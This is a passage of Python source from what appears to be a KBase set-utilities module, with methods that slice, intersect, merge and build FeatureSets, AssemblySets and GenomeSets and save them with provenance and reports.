params['desc'],\n 'element_ordering': element_ordering,\n 'elements': elements}\n\n output_name = params['output_name']\n if len(params['input_featureSet_refs']) > 1:\n output_name += '-' + this_featureSet_obj_name\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': output_name,\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n feature_list_lens.append(len(element_ordering))\n objects_created.append({'ref': params['workspace_name'] + '/' + output_name,\n 'description': params['desc']})\n\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n obj_i = -1\n for output_i,list_len in enumerate(feature_list_lens):\n if feature_list_lens[output_i] == 0:\n report += 'No features for requested genomes in featureSet '+str(params['input_featureSet_refs'][output_i])+\"\\n\"\n else:\n obj_i += 1\n report += 'features in output set ' + objects_created[obj_i]['ref'] + ': '\n report += str(feature_list_lens[output_i]) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Slice_FeatureSets_by_Genomes DONE\")\n #END KButil_Slice_FeatureSets_by_Genomes\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Slice_FeatureSets_by_Genomes return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Logical_Slice_Two_FeatureSets(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Logical_Slice_Two_FeatureSets_Params\"\n (KButil_Logical_Slice_Two_FeatureSets() ** ** Method for Slicing\n Two FeatureSets by Venn overlap) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_featureSet_ref_A\" of type \"data_obj_ref\",\n parameter \"input_featureSet_ref_B\" of type \"data_obj_ref\",\n parameter \"operator\" of String, parameter \"desc\" of String,\n parameter \"output_name\" of type \"data_obj_name\"\n :returns: instance of type\n \"KButil_Logical_Slice_Two_FeatureSets_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Logical_Slice_Two_FeatureSets\n console = []\n invalid_msgs = []\n self.log(console, 'Running Logical_Slice_Two_FeatureSets with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n genome_id_feature_id_delim = \".f:\"\n\n\n # check params\n required_params = ['workspace_name',\n 'operator',\n 'input_featureSet_ref_A',\n 'input_featureSet_ref_B',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced FeatureSet'\n\n\n # Get FeatureSets\n #\n FeatureSet = dict()\n FeatureSet['A'] = dict()\n FeatureSet['B'] = dict()\n input_featureSet_refs = dict()\n input_featureSet_refs['A'] = params['input_featureSet_ref_A']\n input_featureSet_refs['B'] = params['input_featureSet_ref_B']\n input_featureSet_names = dict()\n for set_id in ['A','B']:\n\n (this_featureSet,\n info,\n this_featureSet_obj_name,\n type_name) = self.get_obj_data(input_featureSet_refs[set_id], 'featureSet')\n\n if type_name != 'FeatureSet':\n raise ValueError(\"Bad Type: Should be FeatureSet instead of '\" + type_name + \"'\")\n\n input_featureSet_names[set_id] = this_featureSet_obj_name\n FeatureSet[set_id] = this_featureSet\n if 'element_ordering' not in list(this_featureSet.keys()):\n FeatureSet[set_id]['element_ordering'] = sorted(this_featureSet['elements'].keys())\n logMsg = 'features in input set {} - {}: {}'.format(set_id,\n this_featureSet_obj_name,\n len(FeatureSet[set_id]['element_ordering']))\n self.log(console, logMsg)\n report += logMsg+\"\\n\"\n \n\n # Store A and B genome + fid hits\n #\n genome_feature_present = dict()\n genome_feature_present['A'] = dict()\n genome_feature_present['B'] = dict()\n featureSet_genome_ref_to_standardized = dict() # must use standardized genome_refs\n\n for set_id in ['A','B']:\n for fId in FeatureSet[set_id]['element_ordering']:\n feature_standardized_genome_refs = []\n for this_genome_ref in FeatureSet[set_id]['elements'][fId]:\n\n if this_genome_ref in featureSet_genome_ref_to_standardized:\n standardized_genome_ref_noVer = featureSet_genome_ref_to_standardized[this_genome_ref]\n else: # get standardized genome_ref\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n\n acceptable_types = [\"KBaseGenomes.Genome\", \"KBaseGenomeAnnotations.GenomeAnnotation\",\"KBaseMetagenomes.AnnotatedMetagenomeAssembly\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_genome_ref_noVer = '{}/{}'.format(genome_obj_info[WSID_I],\n genome_obj_info[OBJID_I])\n featureSet_genome_ref_to_standardized[this_genome_ref] = standardized_genome_ref_noVer\n feature_standardized_genome_refs.append(standardized_genome_ref_noVer) # standardize list\n combo_id = standardized_genome_ref_noVer + genome_id_feature_id_delim + fId\n genome_feature_present[set_id][combo_id] = True\n self.log(console,\"Set {} contains {}\".format(set_id,combo_id))\n FeatureSet[set_id]['elements'][fId] = feature_standardized_genome_refs\n\n\n # Build sliced FeatureSet\n #\n self.log (console, \"BUILDING SLICED FEATURESET\\n\")\n output_element_ordering = []\n output_elements = dict()\n if params['operator'] == 'yesA_yesB' or params['operator'] == 'yesA_noB':\n input_element_ordering = FeatureSet['A']['element_ordering']\n fwd_set_id = 'A'\n rev_set_id = 'B'\n else:\n input_element_ordering = FeatureSet['B']['element_ordering']\n fwd_set_id = 'B'\n rev_set_id = 'A'\n\n for fId in input_element_ordering:\n feature_hit = False\n genomes_retained = []\n for this_genome_ref_noVer in FeatureSet[fwd_set_id]['elements'][fId]:\n combo_id = this_genome_ref_noVer + genome_id_feature_id_delim + fId\n self.log (console, \"\\t\"+'checking set {} genome+fid: {}'.format(fwd_set_id,combo_id))\n\n if params['operator'] == 'yesA_yesB':\n if genome_feature_present[rev_set_id].get(combo_id):\n feature_hit = True\n genomes_retained.append(this_genome_ref_noVer)\n self.log(console, \"keeping feature {}\".format(combo_id))\n else:\n if not genome_feature_present[rev_set_id].get(combo_id):\n feature_hit = True\n genomes_retained.append(this_genome_ref_noVer)\n self.log(console, \"keeping feature {}\".format(combo_id))\n\n if feature_hit:\n output_element_ordering.append(fId)\n output_elements[fId] = genomes_retained\n logMsg = 'features in sliced output set: {}'.format(len(output_element_ordering))\n self.log(console, logMsg)\n\n\n # Save output FeatureSet\n #\n objects_created = []\n\n # set provenance\n input_ws_obj_refs = [input_featureSet_refs['A'], input_featureSet_refs['B']]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Logical_Slice_Two_FeatureSets')\n\n if len(output_element_ordering) == 0:\n report += 'no features to output under operator '+params['operator']+\"\\n\"\n\n else:\n\n # Store output object\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING FEATURESET\")\n output_FeatureSet = {'description': params['desc'],\n 'element_ordering': output_element_ordering,\n 'elements': output_elements}\n\n output_name = params['output_name']\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseCollections.FeatureSet',\n 'data': output_FeatureSet,\n 'name': output_name,\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n objects_created.append({'ref': params['workspace_name'] + '/' + output_name,\n 'description': params['desc']})\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"features in output set \" + params['output_name'] + \": \"\n + str(len(output_element_ordering)))\n report += 'features in output set ' + params['output_name'] + ': '\n report += str(len(output_element_ordering)) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Logical_Slice_Two_FeatureSets DONE\")\n #END KButil_Logical_Slice_Two_FeatureSets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Logical_Slice_Two_FeatureSets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Logical_Slice_Two_AssemblySets(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Logical_Slice_Two_AssemblySets_Params\"\n (KButil_Logical_Slice_Two_AssemblySets() ** ** Method for Slicing\n Two AssemblySets by Venn overlap) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_assemblySet_ref_A\" of type \"data_obj_ref\",\n parameter \"input_assemblySet_ref_B\" of type \"data_obj_ref\",\n parameter \"operator\" of String, parameter \"desc\" of String,\n parameter \"output_name\" of type \"data_obj_name\"\n :returns: instance of type\n \"KButil_Logical_Slice_Two_AssemblySets_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Logical_Slice_Two_AssemblySets\n console = []\n invalid_msgs = []\n self.log(console, 'Running Logical_Slice_Two_AssemblySets with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'operator',\n 'input_assemblySet_ref_A',\n 'input_assemblySet_ref_B',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced AssemblySet'\n\n\n # Get AssemblySets\n #\n AssemblySet = dict()\n AssemblySet['A'] = dict()\n AssemblySet['B'] = dict()\n input_assemblySet_refs = dict()\n input_assemblySet_refs['A'] = params['input_assemblySet_ref_A']\n input_assemblySet_refs['B'] = params['input_assemblySet_ref_B']\n input_assemblySet_names = dict()\n for set_id in ['A','B']:\n\n (this_assemblySet,\n info,\n this_assemblySet_obj_name,\n type_name) = self.get_obj_data(input_assemblySet_refs[set_id], 'assemblySet')\n\n if type_name != 'AssemblySet':\n raise ValueError(\"Bad Type: Should be AssemblySet instead of '\" + type_name + \"'\")\n\n input_assemblySet_names[set_id] = this_assemblySet_obj_name\n AssemblySet[set_id] = this_assemblySet\n logMsg = 'assemblies in input set {} - {}: {}'.format(set_id,\n this_assemblySet_obj_name,\n len(AssemblySet[set_id]['items']))\n self.log(console, logMsg)\n report += logMsg+\"\\n\"\n \n\n # Store A and B assemblies\n #\n assembly_obj_present = dict()\n assembly_obj_present['A'] = dict()\n assembly_obj_present['B'] = dict()\n assembly_ref_to_standardized = dict() # must use standardized assembly_refs\n\n for set_id in ['A','B']:\n new_items = []\n for item in AssemblySet[set_id]['items']:\n standardized_assembly_refs = []\n this_assembly_ref = item['ref']\n \n if this_assembly_ref in assembly_ref_to_standardized:\n standardized_assembly_ref_noVer = assembly_ref_to_standardized[this_assembly_ref]\n else: # get standardized assembly_ref\n (assembly_obj_info,\n assembly_obj_name,\n assembly_obj_type) = self.get_obj_info(this_assembly_ref, 'assembly', full_type=True)\n\n acceptable_types = [\"KBaseGenomeAnnotations.Assembly\"]\n if assembly_obj_type not in acceptable_types:\n raise ValueError(\"Input Assembly of type: '\" + assembly_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_assembly_ref_noVer = '{}/{}'.format(assembly_obj_info[WSID_I],\n assembly_obj_info[OBJID_I])\n assembly_ref_to_standardized[this_assembly_ref] = standardized_assembly_ref_noVer\n standardized_assembly_refs.append(standardized_assembly_ref_noVer) # standardize list\n assembly_obj_present[set_id][standardized_assembly_ref_noVer] = True\n new_items.append({'ref':standardized_assembly_ref_noVer,'label':item['label']})\n self.log(console,\"Set {} contains {}\".format(set_id,standardized_assembly_ref_noVer))\n AssemblySet[set_id]['items'] = new_items\n\n\n # Build sliced AssemblySet\n #\n self.log (console, \"BUILDING SLICED ASSEMBLYSET\")\n output_items = []\n if params['operator'] == 'yesA_yesB' or params['operator'] == 'yesA_noB':\n input_items = AssemblySet['A']['items']\n fwd_set_id = 'A'\n rev_set_id = 'B'\n else:\n input_items = AssemblySet['B']['items']\n fwd_set_id = 'B'\n rev_set_id = 'A'\n\n for item in input_items:\n self.log (console, 'checking assembly {} from set {}'.format(item['ref'],fwd_set_id))\n this_standardized_assembly_ref_noVer = item['ref']\n if params['operator'] == 'yesA_yesB':\n if assembly_obj_present[rev_set_id].get(this_standardized_assembly_ref_noVer):\n self.log(console, \"keeping assembly {}\".format(item['ref']))\n output_items.append(item)\n else:\n if not assembly_obj_present[rev_set_id].get(this_standardized_assembly_ref_noVer):\n self.log(console, \"keeping assembly {}\".format(item['ref']))\n output_items.append(item)\n logMsg = 'assemblies in sliced output set: {}'.format(len(output_items))\n self.log(console, logMsg)\n\n\n # Save output AssemblySet\n #\n objects_created = []\n\n if len(output_items) == 0:\n report += 'no assemblies to output under operator '+params['operator']+\"\\n\"\n else:\n if params.get('desc'):\n output_desc = params['desc']\n else:\n output_desc = 'Venn slice '+params['operator']+' of AssemblySets '+input_assemblySet_names['A']+' and '+input_assemblySet_names['B']\n output_assemblySet_obj = { 'description': output_desc,\n 'items': output_items\n }\n output_assemblySet_name = params['output_name']\n try:\n output_assemblySet_ref = self.setAPI_Client.save_assembly_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_assemblySet_name,\n 'data': output_assemblySet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(output_items) > 0:\n self.log(console, \"assemblies in output set \" + params['output_name'] + \": \"\n + str(len(output_items)))\n report += 'assemblies in output set ' + params['output_name'] + ': '\n report += str(len(output_items)) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Logical_Slice_Two_AssemblySets DONE\")\n #END KButil_Logical_Slice_Two_AssemblySets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Logical_Slice_Two_AssemblySets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Logical_Slice_Two_GenomeSets(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Logical_Slice_Two_GenomeSets_Params\"\n (KButil_Logical_Slice_Two_GenomeSets() ** ** Method for Slicing\n Two AssemblySets by Venn overlap) -> structure: parameter\n \"workspace_name\" of type \"workspace_name\" (** The workspace object\n refs are of form: ** ** objects = ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_genomeSet_ref_A\" of type \"data_obj_ref\",\n parameter \"input_genomeSet_ref_B\" of type \"data_obj_ref\",\n parameter \"operator\" of String, parameter \"desc\" of String,\n parameter \"output_name\" of type \"data_obj_name\"\n :returns: instance of type\n \"KButil_Logical_Slice_Two_GenomeSets_Output\" -> structure:\n parameter \"report_name\" of type \"data_obj_name\", parameter\n \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Logical_Slice_Two_GenomeSets\n console = []\n invalid_msgs = []\n self.log(console, 'Running Logical_Slice_Two_GenomeSets with params=')\n self.log(console, \"\\n\" + pformat(params))\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n logMsg = ''\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'operator',\n 'input_genomeSet_ref_A',\n 'input_genomeSet_ref_B',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Sliced GenomeSet'\n\n\n # Get GenomeSets\n #\n GenomeSet_element_refs = dict()\n input_genomeSet_refs = dict()\n input_genomeSet_refs['A'] = params['input_genomeSet_ref_A']\n input_genomeSet_refs['B'] = params['input_genomeSet_ref_B']\n input_genomeSet_names = dict()\n for set_id in ['A','B']:\n\n (this_genomeSet,\n info,\n this_genomeSet_obj_name,\n type_name) = self.get_obj_data(input_genomeSet_refs[set_id], 'genomeSet')\n\n input_genomeSet_names[set_id] = this_genomeSet_obj_name;\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n\n GenomeSet_element_refs[set_id] = []\n for genome_id in sorted(this_genomeSet['elements'].keys()):\n GenomeSet_element_refs[set_id].append(this_genomeSet['elements'][genome_id]['ref'])\n logMsg = 'genomes in input set {} - {}: {}'.format(set_id,\n this_genomeSet_obj_name,\n len(GenomeSet_element_refs[set_id]))\n self.log(console, logMsg)\n report += logMsg+\"\\n\"\n\n\n # Store A and B genome + fid hits\n #\n genome_obj_present = dict()\n genome_obj_present['A'] = dict()\n genome_obj_present['B'] = dict()\n genome_ref_to_standardized = dict() # must use standardized genome_refs\n\n for set_id in ['A','B']:\n new_element_refs = []\n for this_genome_ref in GenomeSet_element_refs[set_id]:\n standardized_genome_refs = []\n \n if this_genome_ref in genome_ref_to_standardized:\n standardized_genome_ref_noVer = genome_ref_to_standardized[this_genome_ref]\n else: # get standardized genome_ref\n (genome_obj_info,\n genome_obj_name,\n genome_obj_type) = self.get_obj_info(this_genome_ref, 'genome', full_type=True)\n\n acceptable_types = [\"KBaseGenomes.Genome\",\"KBaseGenomeAnnotations.GenomeAnnotation\"]\n if genome_obj_type not in acceptable_types:\n raise ValueError(\"Input Genome of type: '\" + genome_obj_type +\n \"'. Must be one of \" + \", \".join(acceptable_types))\n\n standardized_genome_ref_noVer = '{}/{}'.format(genome_obj_info[WSID_I],\n genome_obj_info[OBJID_I])\n genome_ref_to_standardized[this_genome_ref] = standardized_genome_ref_noVer\n standardized_genome_refs.append(standardized_genome_ref_noVer) # standardize list\n genome_obj_present[set_id][standardized_genome_ref_noVer] = True\n new_element_refs.append(standardized_genome_ref_noVer)\n self.log(console,\"Set {} contains {}\".format(set_id,standardized_genome_ref_noVer))\n GenomeSet_element_refs[set_id] = new_element_refs\n\n\n # Build sliced GenomeSet\n #\n self.log (console, \"BUILDING SLICED GENOMESET\")\n output_items = []\n if params['operator'] == 'yesA_yesB' or params['operator'] == 'yesA_noB':\n input_element_refs = GenomeSet_element_refs['A']\n fwd_set_id = 'A'\n rev_set_id = 'B'\n else:\n input_element_refs = GenomeSet_element_refs['B']\n fwd_set_id = 'B'\n rev_set_id = 'A'\n\n for this_standardized_genome_ref_noVer in input_element_refs:\n self.log (console, 'checking set {} genome {}'.format(set_id,this_standardized_genome_ref_noVer))\n if params['operator'] == 'yesA_yesB':\n if genome_obj_present[rev_set_id].get(this_standardized_genome_ref_noVer):\n output_items.append(this_standardized_genome_ref_noVer)\n self.log(console, \"keeping genome {}\".format(this_standardized_genome_ref_noVer))\n else:\n if not genome_obj_present[rev_set_id].get(this_standardized_genome_ref_noVer):\n output_items.append(this_standardized_genome_ref_noVer)\n self.log(console, \"keeping genome {}\".format(this_standardized_genome_ref_noVer))\n logMsg = 'genomes in sliced output set: {}'.format(len(output_items))\n self.log(console, logMsg)\n\n\n # Save output GenomeSet\n #\n objects_created = []\n\n # set provenance\n input_ws_obj_refs = [input_genomeSet_refs['A'], input_genomeSet_refs['B']]\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Logical_Slice_Two_GenomeSets')\n\n if len(output_items) == 0:\n report += 'no genomes to output under operator '+params['operator']+\"\\n\"\n else:\n # KBaseSearch.GenomeSet form is a dict of elements, not a list of items\n output_elements = dict();\n for genome_ref in sorted(output_items):\n output_elements[genome_ref] = {'ref':genome_ref}\n \n if params.get('desc'):\n output_desc = params['desc']\n else:\n output_desc = 'Venn slice '+params['operator']+' of GenomeSets '+input_genomeSet_names['A']+' and '+input_genomeSet_names['B']\n output_genomeSet_obj = { 'description': output_desc,\n 'elements': output_elements\n }\n output_genomeSet_name = params['output_name']\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{\n 'type': 'KBaseSearch.GenomeSet',\n 'data': output_genomeSet_obj,\n 'name': output_genomeSet_name,\n 'meta': {},\n 'provenance': provenance}]})[0]\n\n objects_created.append({'ref': params['workspace_name'] + '/' + output_genomeSet_name,\n 'description': output_desc})\n\n \n\n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(output_items) > 0:\n self.log(console, \"assemblies in output set \" + params['output_name'] + \": \"\n + str(len(output_items)))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(output_items)) + \"\\n\"\n reportObj = {\n 'objects_created': objects_created,\n 'text_message': report\n }\n else:\n reportObj = {\n 'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Logical_Slice_Two_GenomeSets DONE\")\n #END KButil_Logical_Slice_Two_GenomeSets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Logical_Slice_Two_GenomeSets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Merge_GenomeSets(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Merge_GenomeSets_Params\"\n (KButil_Merge_GenomeSets() ** ** Method for merging GenomeSets)\n -> structure: parameter \"workspace_name\" of type \"workspace_name\"\n (** The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Merge_GenomeSets_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Merge_GenomeSets\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Merge_GenomeSets with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Merged GenomeSet'\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 2:\n self.log(console, \"Must provide at least two GenomeSets\")\n self.log(invalid_msgs, \"Must provide at least two GenomeSets\")\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = params['input_refs']\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Merge_GenomeSets')\n\n # Build GenomeSet\n #\n elements = dict()\n\n # Add Genomes from GenomeSets\n for input_genomeset_ref in params['input_refs']:\n\n (genomeSet,\n info,\n this_genomeSet_obj_name,\n type_name) = self.get_obj_data(input_genomeset_ref, 'genomeSet')\n\n if type_name != 'GenomeSet':\n raise ValueError(\"Bad Type: Should be GenomeSet instead of '\" + type_name + \"'\")\n\n for gId in list(genomeSet['elements'].keys()):\n old_genomeRef = genomeSet['elements'][gId]['ref']\n (this_obj_info,\n this_obj_name,\n this_obj_type) = self.get_obj_info(old_genomeRef, 'genome')\n\n standardized_genomeRef = self.get_obj_ref_from_obj_info_noVer(this_obj_info)\n new_gId = standardized_genomeRef\n if not elements.get(new_gId):\n elements[new_gId] = dict()\n elements[new_gId]['ref'] = standardized_genomeRef # the key line\n self.log(console, \"adding element \" + new_gId + \" : \" + standardized_genomeRef)\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console, \"SAVING GENOMESET\")\n output_GenomeSet = {'description': params['desc'],\n 'elements': elements\n }\n\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_GenomeSet,\n 'name': params['output_name'],\n 'meta': {},\n 'provenance': provenance\n }]\n })[0]\n \n # build output report object\n self.log(console, \"BUILDING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console, \"genomes in output set \" + params['output_name'] + \": \" +\n str(len(list(elements.keys()))))\n report += 'genomes in output set ' + params['output_name'] + ': '\n report += str(len(list(elements.keys()))) + \"\\n\"\n ref = params['workspace_name'] + '/' + params['output_name']\n reportObj = {'objects_created': [{'ref': ref,\n 'description': 'KButil_Merge_GenomeSets'}],\n 'text_message': report\n }\n else:\n report += \"FAILURE:\\n\\n\" + \"\\n\".join(invalid_msgs) + \"\\n\"\n reportObj = {'objects_created': [],\n 'text_message': report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console, \"KButil_Merge_GenomeSets DONE\")\n #END KButil_Merge_GenomeSets\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Merge_GenomeSets return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Build_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Build_GenomeSet_Params\"\n (KButil_Build_GenomeSet() ** ** Method for creating a GenomeSet)\n -> structure: parameter \"workspace_name\" of type \"workspace_name\"\n (** The workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"input_refs\" of type \"data_obj_ref\", parameter\n \"output_name\" of type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Build_GenomeSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Build_GenomeSet\n console = []\n invalid_msgs = []\n self.log(console, 'Running KButil_Build_GenomeSet with params=')\n self.log(console, \"\\n\" + pformat(params))\n report = ''\n\n\n # check params\n required_params = ['workspace_name',\n 'input_refs',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Built GenomeSet'\n\n # clean input_refs\n clean_input_refs = []\n for ref in params['input_refs']:\n if ref is not None and ref != '' and ref not in clean_input_refs:\n clean_input_refs.append(ref)\n params['input_refs'] = clean_input_refs\n\n if len(params['input_refs']) < 1:\n self.log(console, \"Must provide at least one Genome\")\n self.log(invalid_msgs, \"Must provide at least one Genome\")\n\n # Build GenomeSet\n #\n elements = {}\n genome_seen = dict()\n\n for genomeRef in params['input_refs']:\n\n if not genome_seen.get(genomeRef):\n genome_seen[genomeRef] = True\n\n (genomeObj,\n info,\n obj_name,\n type_name) = self.get_obj_data(genomeRef, 'genome')\n\n if type_name != 'Genome' and type_name != 'GenomeAnnotation':\n errMsg = \"Bad Type: Should be Genome or GenomeAnnotation not 